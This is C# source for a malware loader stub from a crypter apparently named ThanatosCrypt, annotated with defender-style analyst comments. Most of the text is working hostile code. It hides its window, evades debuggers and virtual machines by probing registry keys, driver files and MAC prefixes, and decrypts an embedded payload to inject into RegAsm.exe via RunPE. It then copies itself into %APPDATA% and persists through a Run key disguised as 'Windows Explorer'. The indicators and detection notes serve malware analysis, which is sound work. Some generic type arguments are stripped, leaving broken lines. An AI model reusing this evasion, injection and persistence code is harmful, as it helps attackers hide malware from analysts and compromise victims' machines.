// Analyst notes (defender's view). These members belong to the Form1 class whose declaration
// is outside this excerpt. Together they implement a loader stub: the form is never shown, a
// machine-global mutex enforces a single instance, debugger and virtual-machine checks run, and
// only on a host that looks "clean" is an embedded resource decrypted and handed to
// RunPE.Execute together with the path of the genuine RegAsm.exe, after which a copy of this
// assembly is installed under %APPDATA% and registered in a Run key. Everything stated here is
// visible in this file; RunPE, Decryptor and ThanatosCrypt.Resource1 are defined elsewhere.
// NOTE(review): generic type arguments (e.g. List<string>) appear to have been stripped from
// this copy, probably by HTML extraction; the code is kept exactly as found.

// Install location: %APPDATA%\Windows .NET Framework\RegAsm.exe. The genuine RegAsm.exe lives
// in the .NET runtime directory (see RuntimeEnvironment.GetRuntimeDirectory() in the
// constructor), so a RegAsm.exe under a user's roaming profile is itself an indicator worth
// alerting on.
public static string installDir = Environment.GetEnvironmentVariable("appdata") + "\\Windows .NET Framework";
public static string installLoc = installDir + "\\RegAsm.exe";
// Value name written to the Run key; chosen to resemble a benign Windows component.
public static string myreg = "Windows Explorer";

/// <summary>
/// Registers <see cref="installLoc"/> under a Run key so the installed copy starts at logon.
/// HKLM is opened writable first (without elevation that open typically fails and the blanket
/// catch swallows it). If the HKLM value already exists, the same write is retried against
/// HKCU and then HKLM once more. Every failure is silently ignored; nothing is logged.
/// IR: check both HKLM and HKCU ...\CurrentVersion\Run for a value named "Windows Explorer"
/// that points at a RegAsm.exe outside the .NET runtime directory. Sysmon registry value-set
/// events (Event ID 13) on these keys give a detection point.
/// </summary>
public static void AddStartup()
{
    try
    {
        RegistryKey sKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
        if (sKey.GetValue(myreg) == null)
        {
            sKey.SetValue(myreg, installLoc);
            sKey.Close(); // only this path closes its key; the keys opened below are never closed
        }
        else
        {
            try
            {
                RegistryKey cKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
                if (cKey.GetValue(myreg) == null)
                {
                    cKey.SetValue(myreg, installLoc);
                }
                else
                {
                }
            }
            catch
            {
                // swallowed: HKCU write failed or the key could not be opened
            }
            try
            {
                RegistryKey cKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
                if (cKey.GetValue(myreg) == null)
                {
                    cKey.SetValue(myreg, installLoc);
                }
                else
                {
                }
            }
            catch
            {
                // swallowed: second HKLM attempt failed
            }
        }
    }
    catch
    {
        // swallowed: first HKLM open/read failed (e.g. not elevated)
    }
}

/// <summary>
/// Self-install step. If this assembly is not already running from <see cref="installLoc"/>,
/// the install directory is created and the running executable is copied there (errors
/// swallowed); <see cref="AddStartup"/> is then called whether or not the copy succeeded.
/// Detection: a copy of the running image into %APPDATA% immediately followed by a Run-key
/// write is a compact behavioural signature (Sysmon Event ID 11 then Event ID 13).
/// </summary>
public static void EnvSetup()
{
    if (System.Reflection.Assembly.GetExecutingAssembly().Location != installLoc)
    {
        try
        {
            if (!Directory.Exists(installDir))
            {
                Directory.CreateDirectory(installDir);
            }
            // File.Copy without the overwrite flag throws if the target already exists;
            // the catch below hides that, so an existing install is left untouched.
            File.Copy(System.Reflection.Assembly.GetExecutingAssembly().Location, installLoc);
        }
        catch
        {
            // swallowed: directory creation or copy failed
        }
    }
    else
    {
    }
    AddStartup();
}

// Anti-debugging probes imported from kernel32. CheckRemoteDebuggerPresent reports whether a
// debugger is attached to the process identified by hProcess; IsDebuggerPresent reports the
// same for the calling process. Both are combined with System.Diagnostics.Debugger.IsAttached
// in the constructor's final gate.
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);

[DllImport("kernel32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]
internal static extern bool IsDebuggerPresent();

/// <summary>
/// Constructor that performs all of the stub's work. Sequence: hide the form, acquire a
/// machine-global mutex, run debugger checks, collect VM/sandbox evidence, and — only when
/// every check is clean — launch the payload and then self-install with persistence. The
/// constructor ends with Environment.Exit(0), so the form is never displayed.
/// </summary>
public Form1()
{
    InitializeComponent();
    SetVisibleCore(false); // keep the window hidden for the lifetime of the process

    // The mutex block below appears to be copied from a widely circulated Stack Overflow
    // single-instance snippet; the "edited by" attributions are from that answer.
    // get application GUID as defined in AssemblyInfo.cs
    string appGuid = ((GuidAttribute)Assembly.GetExecutingAssembly().GetCustomAttributes(typeof(GuidAttribute), false).GetValue(0)).Value.ToString();
    // unique id for global mutex - Global prefix means it is global to the machine.
    // Host indicator: the mutex is named "Global\{<assembly GUID>}", so the GUID taken from
    // the sample's GuidAttribute doubles as a mutex name to hunt for.
    string mutexId = string.Format("Global\\{{{0}}}", appGuid);
    // Need a place to store a return value in Mutex() constructor call
    bool createdNew;
    // edited by Jeremy Wiebe to add example of setting up security for multi-user usage
    // edited by 'Marc' to work also on localized systems (don't use just "Everyone")
    var allowEveryoneRule = new MutexAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid, null), MutexRights.FullControl, AccessControlType.Allow);
    var securitySettings = new MutexSecurity();
    securitySettings.AddAccessRule(allowEveryoneRule);
    // edited by MasonGZhwiti to prevent race condition on security settings via VanNguyen
    using (var mutex = new Mutex(false, mutexId, out createdNew, securitySettings))
    {
        // edited by acidzombie24
        var hasHandle = false;
        try
        {
            // note, you may want to time out here instead of waiting forever
            // edited by acidzombie24
            // mutex.WaitOne(Timeout.Infinite, false);
            hasHandle = mutex.WaitOne(5000, false);
            // No enclosing handler in this variant: a second concurrent instance terminates
            // with an unhandled TimeoutException after the 5 s wait.
            if (hasHandle == false)
                throw new TimeoutException("Timeout waiting for exclusive access");
        }
        catch (AbandonedMutexException)
        {
            // Log the fact that the mutex was abandoned in another process,
            // it will still get acquired
            hasHandle = true;
        }

        // --- Anti-debugging ---
        bool isRemoteDebuggerPresent = false;
        CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isRemoteDebuggerPresent);

        // --- Anti-VM / anti-sandbox evidence collection ---
        // Each hit is appended to EvidenceOfSandbox; a non-empty list suppresses the payload.
        // For sandbox operators these lists document exactly which artefacts the sample keys on.
        List EvidenceOfSandbox = new List();
        // Hypervisor names searched (case-insensitively) inside the registry values below.
        List sandboxStrings = new List { "vmware", "virtualbox", "vbox", "qemu", "xen" };
        // Registry keys whose mere existence is taken as evidence of a VMware/VirtualBox guest.
        string[] HKLM_Keys_To_Check_Exist = {@"HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier", @"SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S", @"SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev", @"SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers", @"SOFTWARE\VMWare, Inc.\VMWare Tools", @"SOFTWARE\Oracle\VirtualBox Guest Additions", @"HARDWARE\ACPI\DSDT\VBOX_"};
        // Registry values (key path + value name) whose string data is scanned for sandboxStrings.
        string[] HKLM_Keys_With_Values_To_Parse = {@"SYSTEM\ControlSet001\Services\Disk\Enum\0", @"HARDWARE\Description\System\SystemBiosInformation", @"HARDWARE\Description\System\VideoBiosVersion", @"HARDWARE\Description\System\SystemManufacturer", @"HARDWARE\Description\System\SystemProductName", @"HARDWARE\Description\System\Logical Unit Id 0"};
        foreach (string HKLM_Key in HKLM_Keys_To_Check_Exist)
        {
            RegistryKey OpenedKey = Registry.LocalMachine.OpenSubKey(HKLM_Key, false);
            if (OpenedKey != null)
            {
                EvidenceOfSandbox.Add(@"HKLM:\" + HKLM_Key);
            }
        }
        foreach (string HKLM_Key in HKLM_Keys_With_Values_To_Parse)
        {
            // DirectoryInfo/Path are used purely as string helpers: the last path segment is
            // the value name, the remainder is the key path.
            string valueName = new DirectoryInfo(HKLM_Key).Name;
            try
            {
                string value = (string)Registry.LocalMachine.OpenSubKey(Path.GetDirectoryName(HKLM_Key), false).GetValue(valueName);
                foreach (string sandboxString in sandboxStrings)
                {
                    if (!string.IsNullOrEmpty(value) && value.ToLower().Contains(sandboxString.ToLower()))
                    {
                        EvidenceOfSandbox.Add(@"HKLM:\" + HKLM_Key + " => " + value);
                    }
                }
            }
            catch
            {
                // missing key, non-string value or access failure: treated as no evidence
            }
        }
        // Guest-tools driver and helper binaries (VMware vm*, VirtualBox VBox*) probed by path.
        string[] FilePaths = {@"C:\windows\Sysnative\Drivers\Vmmouse.sys", @"C:\windows\Sysnative\Drivers\vm3dgl.dll", @"C:\windows\Sysnative\Drivers\vmdum.dll", @"C:\windows\Sysnative\Drivers\vm3dver.dll", @"C:\windows\Sysnative\Drivers\vmtray.dll", @"C:\windows\Sysnative\Drivers\vmci.sys", @"C:\windows\Sysnative\Drivers\vmusbmouse.sys", @"C:\windows\Sysnative\Drivers\vmx_svga.sys", @"C:\windows\Sysnative\Drivers\vmxnet.sys", @"C:\windows\Sysnative\Drivers\VMToolsHook.dll", @"C:\windows\Sysnative\Drivers\vmhgfs.dll", @"C:\windows\Sysnative\Drivers\vmmousever.dll", @"C:\windows\Sysnative\Drivers\vmGuestLib.dll", @"C:\windows\Sysnative\Drivers\VmGuestLibJava.dll", @"C:\windows\Sysnative\Drivers\vmscsi.sys", @"C:\windows\Sysnative\Drivers\VBoxMouse.sys", @"C:\windows\Sysnative\Drivers\VBoxGuest.sys", @"C:\windows\Sysnative\Drivers\VBoxSF.sys", @"C:\windows\Sysnative\Drivers\VBoxVideo.sys", @"C:\windows\Sysnative\vboxdisp.dll", @"C:\windows\Sysnative\vboxhook.dll", @"C:\windows\Sysnative\vboxmrxnp.dll", @"C:\windows\Sysnative\vboxogl.dll", @"C:\windows\Sysnative\vboxoglarrayspu.dll", @"C:\windows\Sysnative\vboxoglcrutil.dll", @"C:\windows\Sysnative\vboxoglerrorspu.dll", @"C:\windows\Sysnative\vboxoglfeedbackspu.dll", @"C:\windows\Sysnative\vboxoglpackspu.dll", @"C:\windows\Sysnative\vboxoglpassthroughspu.dll", @"C:\windows\Sysnative\vboxservice.exe", @"C:\windows\Sysnative\vboxtray.exe", @"C:\windows\Sysnative\VBoxControl.exe"};
        foreach (string FilePath in FilePaths)
        {
            if (File.Exists(FilePath))
            {
                EvidenceOfSandbox.Add(FilePath);
            }
        }
        // MAC OUI prefixes assigned to VMware and VirtualBox virtual NICs. Any adapter whose
        // physical address contains one of them is recorded, reformatted with colon separators.
        string[] badMacAddresses = { @"000C29", @"001C14", @"005056", @"000569", @"080027" };
        NetworkInterface[] NICs = NetworkInterface.GetAllNetworkInterfaces();
        foreach (NetworkInterface NIC in NICs)
        {
            foreach (string badMacAddress in badMacAddresses)
            {
                if (NIC.GetPhysicalAddress().ToString().ToLower().Contains(badMacAddress.ToLower()))
                {
                    EvidenceOfSandbox.Add(Regex.Replace(NIC.GetPhysicalAddress().ToString(), ".{2}", "$0:").TrimEnd(':'));
                }
            }
        }

        // --- Payload launch, gated on every check passing ---
        // RunPE.Execute and Decryptor.Decrypt are not in this file. Judging by their names and
        // arguments, the decrypted bytes of the embedded string resource
        // ThanatosCrypt.Resource1.primary (re-encoded with the system default code page) are
        // presumably injected into a RegAsm.exe process started from the real .NET runtime
        // directory — confirm against RunPE's definition. Decryptor.Decrypt receives the ASCII
        // bytes of the literal "DSNVLUOHFWE" as its first argument, presumably the key, so the
        // payload should be recoverable statically from the resource plus that literal.
        // Detection: RegAsm.exe spawned by this stub rather than by a build tool, followed by
        // a Run-key write pointing at %APPDATA%.
        if (!IsDebuggerPresent() && !isRemoteDebuggerPresent && !System.Diagnostics.Debugger.IsAttached && EvidenceOfSandbox.Count == 0)
        {
            RunPE.Execute(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe"), Decryptor.Decrypt(Encoding.ASCII.GetBytes("DSNVLUOHFWE"), Encoding.Default.GetBytes(ThanatosCrypt.Resource1.primary)));
            EnvSetup();
        }
        // edited by acidzombie24, added if statement
        if (hasHandle)
            mutex.ReleaseMutex();
        // The stub never returns to a message loop: the process ends here.
        Environment.Exit(0);
    }
}